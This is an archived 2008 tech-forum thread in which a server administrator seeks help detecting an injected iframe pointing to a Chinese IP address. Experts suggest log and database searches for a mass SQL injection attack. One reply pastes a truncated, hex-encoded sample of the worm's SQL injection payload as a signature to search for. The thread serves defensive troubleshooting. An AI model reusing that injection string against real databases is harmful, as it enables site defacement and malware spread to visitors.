July 24, 2008 02:04am pdt

1. rpggamer... 40,008
2. IndiGenus 36,230
3. jahboite 26,169
4. r-k 19,590
5. arnold 10,150
6. nsx106052 9,825
7. richrumble 7,050
8. briancassin 7,000
9. ahoffmann 6,907
10. PowerIT 6,400
11. tigermatt 6,148
12. johnb6767 5,600
13. KCTS 5,500
14. rindi 5,350
15. paradoxe... 5,300

1. rpggamer... 152,133
2. r-k 100,837
3. Sheharya... 88,781
4. IndiGenus 58,470
5. war1 45,835
6. blue_zee 39,997
7. sunray_2003 39,840
8. jahboite 32,113
9. ghana 29,660
10. Tolomir 29,508
11. rossfingal 27,308
12. johnb6767 22,034
13. ahoffmann 20,357
14. PowerIT 19,977
15. LucF 17,713

05.07.2008 at 01:30AM PDT, ID: 23381980

	[x] Attachment Details

[x]

The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

The Grade of the Solution
The Zone Rank of the Expert Providing the Solution
The Number of Author and Expert Comments
The Number of Experts Contributing
The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

5.6

IFRAME attack, how to detect / remove from server

Zones: Networking Security Vulnerabilities, Firefox Web Browser, WebApplications

One of our application servers appears to have suffered from an iframe attack.

Some times we get the following prepended to the normal HTML page.
<iframe src=hxxp://122.224.5.8/4.htm width=100 height=0></iframe>
(I've changed http: to hxxp: to stop someone clicking on it.)

I found the following link:
SQL Injection Worm on the Loose
http://isc.sans.org/diary.html?storyid=4393

The environment we use is.
Mostly FireFox, WinXP SP2, Apache2.0, MySQL
The application is Windows ISAPI DLL

Start your free trial to view this solution

Question Stats

Zone: Security

Question Asked By: Matthew_Way

Solution Provided By: riotz

Participating Experts: 3

Solution Grade: B

Translate:

Loading Advertisement...

Microsoft

Internet Protocols
Applications

Development
OS

Hardware
Windows Security

Apple

Operating Systems
Hardware

Programming
Networking

Software

Internet

Search Engines
File Sharing
WebTrends / Stats
Spy / Ad Blockers

Web Browsers
New Net Users
Web Development
Chat / IM

Anti Spam
Web Servers
Anti-Virus
Email Clients

Gamers

Tips
Online / MMORPG
Puzzle
Emulators

Action / Adventure
Role Playing
Consoles
Game Programming

Strategy
Sports
Misc
Computer Games

Digital Living

Hardware
Automotive
New Net Users
New Users

Software
Digital Music
Gaming World
Home Security

Apple
Networking Hardware

Virus & Spyware

Vulnerabilities
IDS
Encryption
Anti-Virus

Operating Systems Security
Software Firewalls
WebApplications
Cell Phones

Operating Systems
Internet
Hardware Firewalls

Hardware

Displays / Monitors
Handhelds / PDAs
Components
Peripherals
Laptops/Notebooks

Servers
Misc
Apple
Embedded Hardware
Networking Hardware

Storage
Desktops
New Users

Software

System Utilities
Industry Specific
Network Management
Photos / Graphics
Page Layout
VMware
Misc
Web Development

OS
CYGWIN
Voice Recognition
Virtualization
Message Queue
Quality Assurance
Security
Firewalls

MultiMedia Applications
Development
Database
Office / Productivity
Business Management
OS/2 Apps
Server Software
Internet / Email

ITPro

OS
Storage
Encryption
Operating Systems Security
Apple Hardware
Laptops & Notebooks
Servers
Networking Hardware
Peripherals
Devices

Displays / Monitors
WebTrends / Stats
Search Engines
Firewalls
Web Computing
WebApplications
IDS
Vulnerabilities
Email Clients
File Sharing

Spy / Ad Blockers
Web Browsers
Web Servers
Networking
Anti-Virus
Consulting
Chat / IM
Anti Spam

Developer

Web Servers
Web Browsers
Game Programming
Dev Tools
Industry Specific
Office / Productivity

Database
CYGWIN
Web Development
Search Engines
File Sharing
WebTrends / Stats

Programming
Content Management
Application Servers
Protocols

Storage

Removable Backup Media
Storage Technology
Servers

Grid
Remote Access
Backup / Restore

Misc
Hard Drives

Miscellaneous
Security
Development
Linux
VMware

MainFrame OS
Unix
Apple
OS / 2
AS / 400

BeOS
Microsoft
VMS / OpenVMS

Database

Oracle
Miscellaneous
MySQL
Software
Sybase
Contact Management
PostgreSQL
Data Manipulation
Clarion
InterSystems Cache

Siebel
MUMPS
OLAP
SQLBase
SAS
GIS & GPS
4GL
Berkeley DB
DB2
Informix

Interbase / Firebird
FoxPro
Reporting
LDAP
Filemaker Pro
MS SQL Server
dBase
MS Access

Security

Misc
Web Browsers
Software Firewalls
Operating Systems Security
File Sharing

Spy / Ad Blockers
Vulnerabilities
WebApplications
IDS
Anti-Virus

Encryption
Anti Spam
Email Clients
VPN
Chat / IM

Programming

Editors IDEs
Installation
Handhelds / PDAs
Multimedia Programming
System / Kernel
Automation

Algorithms
Game
Signal Processing
Project Management
Open Source
Database

Misc
Languages
Processor Platforms
Theory

Web Development

Scripting
Blogs
Web Servers
Software
Search Engines
Web Graphics
Web Services

Images
Internet Marketing
Images and Photos
Components
Document Imaging
Web Languages/Standards
Illustration

WebApplications
Fonts
WebTrends / Stats
Authoring
Digital Camera Software
Miscellaneous

Networking

Protocols
Apple Networking
Network Management
Message Queue
Application Servers
Content Management
File Servers
Email Servers
Misc
Java Editors & IDEs

Wireless
Networking Hardware
Backup / Restore
System Utilities
ISPs & Hosting
Web Servers
Storage Technology
Removable Backup Media
Servers
Web Computing

Broadband
Grid
OS / 2
Novell Netware
Unix Networking
Windows Networking
Security
Telecommunications
Operating Systems
Linux Networking

Other

Lounge
Business Travel
Community Support
New Net Users

Philosophy / Religion
Math / Science
Miscellaneous
URLs

Expert Lounge
Politics
Puzzles / Riddles
Automotive

Community Support

Suggestions
New to EE
New Topics
CleanUp

Announcements
General
Feedback

Input
EE Bugs

05.07.2008 at 03:22AM PDT, ID: 21514819

Rank: Master

Ray_Paseur:

One of the best writers on the subject is Chris Shiflett. Start by reading his blog, then consider buying his book. Excellent advice all around.

Link here:
http://shiflett.org/blog/2006/nov/stealing-saved-passwords

Good luck!

05.07.2008 at 07:57AM PDT, ID: 21517099

riotz:

your application suffers from a sql injection flaw..

sanitize all the input paramters from the webapplication or you can suffer from a complete overtake of your webserver sooner or later

for a first start just go thru the logs and search for unusual long parameters that got passed and returned a http 200 code.. this should identify the vulnerable page pretty fast..

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006&

this is a sample snippet of the attack you should search for.

05.07.2008 at 01:45PM PDT, ID: 21520224

Matthew_Way:

I went back 3 months of access log and searched for 'DECLARE', I didn't find any matches.

I've noticed that the IFRAME which gets attached to our pages, isn't always there.
For example this morning I logged into the App and no extra IFRAME.

I agree with you about sanitizing inputs, and I do with my own PHP scripts.
But this application is closed source and in windows DLL format.

Where should I look next ?

Will it be in a JS, HTML file ?
Or SQL ??

05.07.2008 at 01:50PM PDT, ID: 21520257

riotz:

it can be anything thats passing input to your dll

05.07.2008 at 01:59PM PDT, ID: 21520302

riotz:

probably one of your forms..

05.07.2008 at 02:02PM PDT, ID: 21520334

Matthew_Way:

Any utilities that I could download to help ??

05.07.2008 at 02:08PM PDT, ID: 21520370

riotz:

you have to identify the infection somehow first too..

i would suggest scanning the whole db and all the webfiles for that url you pasted earlyer..

and maybe take the write privilege from the dbuser the webapp is using

05.07.2008 at 02:10PM PDT, ID: 21520380

riotz:

hmm, none thats free and i'm aware of

05.07.2008 at 02:58PM PDT, ID: 21520706

Matthew_Way:

Problem is the App reads / writes lots of files to the web root.

05.07.2008 at 04:19PM PDT, ID: 21521208

Matthew_Way:

Okay I've scanned all files for;
document.write
iframe
declare
122.224.5.8

How do I scan a MySQL database and what am I scanning for ?

05.08.2008 at 01:04PM PDT, ID: 21528002

The_eagle:

Why don't you use stored procedures? This way you will block the SQL injection

05.08.2008 at 01:43PM PDT, ID: 21528290

Matthew_Way:

I don't have any control over the application it's a Windows DLL closed source application.
The app also stores all it's working files in the webroot, so less than ideal.

Problem is how do I track this inserted iframe down ?
In the last 2 days I don't get the inserted iframe anymore, is the problem still there ?

Could I be looking for something I will never find ?

05.08.2008 at 01:46PM PDT, ID: 21528319

The_eagle:

After all, this is a webapplication, so on the onblur event of the textbox, check for SQL statements

05.08.2008 at 02:19PM PDT, ID: 21528575

Matthew_Way:

Okay I worked out how to "Scan" the whole MySQL database.

Do a MySQL Dump then grep the backuped up SQL file.

Did a search for:
iframe, javascript, declare, document.write
And didn't get any matches.

05.08.2008 at 02:23PM PDT, ID: 21528598

The_eagle:

The following site provides a complete reference of javascript:

http://www.w3schools.com/

05.08.2008 at 02:40PM PDT, ID: 21528708

Matthew_Way:

I know javascript very well.
i have my own application using AJAX - jQuery.

My preferred secure environment is BSD with jailing.

But this problem for this customer is Windows DLL land.
It's written in Delphi and I only have the binary copy.

So the question there has been something injected into the SQL database.
It's got to have some key words such as:
iframe,javascript,declare,document.write

05.08.2008 at 02:49PM PDT, ID: 21528759

riotz:

can you please describe a bit more when and where the injection apeared?

did you browse the site and stubled uppon it?
or have you clicked a static link from your favourites and it was once there once not..

05.08.2008 at 07:36PM PDT, ID: 21530103

Matthew_Way:

Thats the problem I don't know that it's an injection attack.

About 3 days ago I noticed that our web application was transferring data from a strange url
Did a view source and noticed an <iframe> tag right at the top of the HTML even before the <head> tag.
Same issue happened with some of our other users around the same time.
The injected iframe no longer appears, as of last night.

I got to the URL by typing it in.
The other users I would imagine are using a book mark.

05.08.2008 at 11:10PM PDT, ID: 21530670

riotz:

well it definately sounds like an injection.. but if you cant find anything in the database and nothing in your files it doesnt sound like an sql injection to me..

maybe theres a public user on your site thats attacking your users with xss attacks or similar like some xpath/ldap..

since it looks like youre overstrained with this whole theme a bit i would suggest you to get a professional it-security specialist to look at your site.

Accepted Solution

05.09.2008 at 05:37AM PDT, ID: 21532098

Rank: Master

Ray_Paseur:

Your attacker is probably Chinese:
http://www.google.com/search?hl=en&q=IP+address+122.224.5.8&btnG=Google+Search

Does the Delphi application generate your HTML? If so you might want to go back to the author and ask if there has been a record of attacks.

"noticed an <iframe> tag right at the top of the HTML even before the <head> tag."

More likely, someone has hacked into the server that serves up the HTML and is causing the server to serve up the iframe. You might want to consider reinstalling the server software and, of course, changing all the passwords.

Good luck, ~Ray

Assisted Solution

05.09.2008 at 02:22PM PDT, ID: 21536480

Matthew_Way:

Yes the redirection is Chinese, the server is in Shanghai China.

And we get lots of wired and wonderful things happening with the internet in China.
A number of the problems in the past that we have had with DNS poisoning actually turned out to be our ISP which is government owned.

What ever is was I think it's gone now.

But just wanted to make sure.

05.23.2008 at 03:47AM PDT, ID: 21630870

Matthew_Way:

It appears that the problem was with our ISP and not our server.

20080236-EE-VQP-29 / EE_QW_2_20070628